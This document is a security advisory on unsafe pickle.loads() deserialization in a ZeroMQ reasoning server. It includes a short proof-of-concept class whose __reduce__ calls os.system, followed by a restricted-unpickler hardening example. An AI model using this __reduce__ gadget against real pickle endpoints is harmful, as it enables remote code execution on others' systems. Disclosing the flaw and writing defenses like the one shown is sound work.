### Key Information

#### Vulnerability Type

- **Remote Code Execution (RCE) Vulnerability**

#### Affected Code

- `experiments.robot.bridge.reasoning_server::run_reasoning_server`

#### Vulnerability Description

- The server receives messages via ZeroMQ and deserializes them using `pickle.loads()`.
- Because `pickle.loads()` instantiates whatever objects the byte stream names (including callables referenced through `__reduce__`), any client that can reach the socket can make the server execute arbitrary code with the server process's privileges.

#### Vulnerable Code Snippet

```python
while True:
    message = socket.recv()
    inputs = pickle.loads(message)  # Unsafe deserialization of untrusted input
    result = model.raw_generate(inputs)
    socket.send(pickle.dumps(result))
```

#### Proof of Concept (PoC)

1. Start the vulnerable server:

```bash
PYTHONPATH=. python3 experiments/robot/bridge/reasoning_server.py
```

2. Run client code to send malicious payload:

```python
import pickle, zmq

class Payload(object):
    def __reduce__(self):
        import os
        return (os.system, ('echo "hacked"',))
```

#### Summary

- The vulnerability exists in the `run_reasoning_server` function due to the unsafe use of `pickle.loads()` for deserialization, leading to a risk of remote code execution.
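The following is an added example of how the loop body in `run_reasoning_server` can be hardened; it is not code from the project. It assumes a request allow-list of plain container and scalar types (the real server's request schema is not on the page) and takes the model call as a `generate` callable parameter. A subclassed `pickle.Unpickler` overrides `find_class`, which is the hook every `GLOBAL`/`STACK_GLOBAL` lookup goes through, so a `__reduce__` payload naming a callable such as `os.system` is refused before the `REDUCE` opcode can invoke it. The hostile sample message is constructed with a harmless callable (`os.getcwd`) as a stand-in for the page's payload, so running the demo executes nothing beyond the unpickler's own checks.

```python
import io
import os
import pickle

# Allow-list of globals a request pickle may reference. This is an assumption
# for the example: a real deployment should list exactly the types the
# reasoning server's request schema needs and nothing else.
ALLOWED_GLOBALS = {
    ("builtins", "dict"), ("builtins", "list"), ("builtins", "tuple"),
    ("builtins", "set"), ("builtins", "frozenset"), ("builtins", "str"),
    ("builtins", "bytes"), ("builtins", "int"), ("builtins", "float"),
    ("builtins", "bool"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that rejects every global not on the allow-list.

    pickle resolves callables and classes by calling find_class() for each
    GLOBAL / STACK_GLOBAL opcode. A __reduce__ payload such as
    (os.system, ("...",)) needs that lookup to succeed before REDUCE can call
    the function, so raising here stops the attack before anything runs.
    """

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def safe_loads(data: bytes):
    """Deserialize a request with the restricted unpickler."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def rejects(data: bytes) -> bool:
    """True if the restricted unpickler refuses the message."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


def handle_message(message: bytes, generate) -> bytes:
    """Hardened replacement for one iteration of the server loop.

    `generate` stands in for model.raw_generate. A rejected message yields an
    error reply instead of crashing the server, so a malformed or hostile
    request cannot be used to knock the service over either.
    """
    try:
        inputs = safe_loads(message)
    except (pickle.UnpicklingError, EOFError, ValueError, AttributeError,
            IndexError) as exc:
        return pickle.dumps({"error": f"rejected request: {exc}"})
    return pickle.dumps(generate(inputs))


class _ReduceProbe:
    """Constructed stand-in for the page's Payload class.

    __reduce__ names a harmless callable (os.getcwd) rather than os.system, so
    the demo shows the lookup being blocked without running a shell command.
    """

    def __reduce__(self):
        return (os.getcwd, ())


# Constructed sample messages: one well-formed request, one carrying a
# __reduce__ callable reference of the kind the advisory describes.
BENIGN_REQUEST = pickle.dumps({"prompt": "describe the scene", "max_tokens": 16})
HOSTILE_REQUEST = pickle.dumps(_ReduceProbe())


def demo():
    """Show both messages passing through the hardened handler."""
    echo = lambda inputs: {"text": inputs["prompt"].upper()}  # noqa: E731
    for label, msg in (("benign", BENIGN_REQUEST), ("hostile", HOSTILE_REQUEST)):
        reply = pickle.loads(handle_message(msg, echo))
        print(f"{label}: {reply}")
    return rejects(HOSTILE_REQUEST) and not rejects(BENIGN_REQUEST)


if __name__ == "__main__":
    demo()
```

The restricted unpickler is a containment measure for code that must keep speaking pickle; the cleaner fix is to stop accepting pickle from the network at all and move the request channel to a schema-validated format such as JSON, and in either case to bind the ZeroMQ socket only to trusted interfaces.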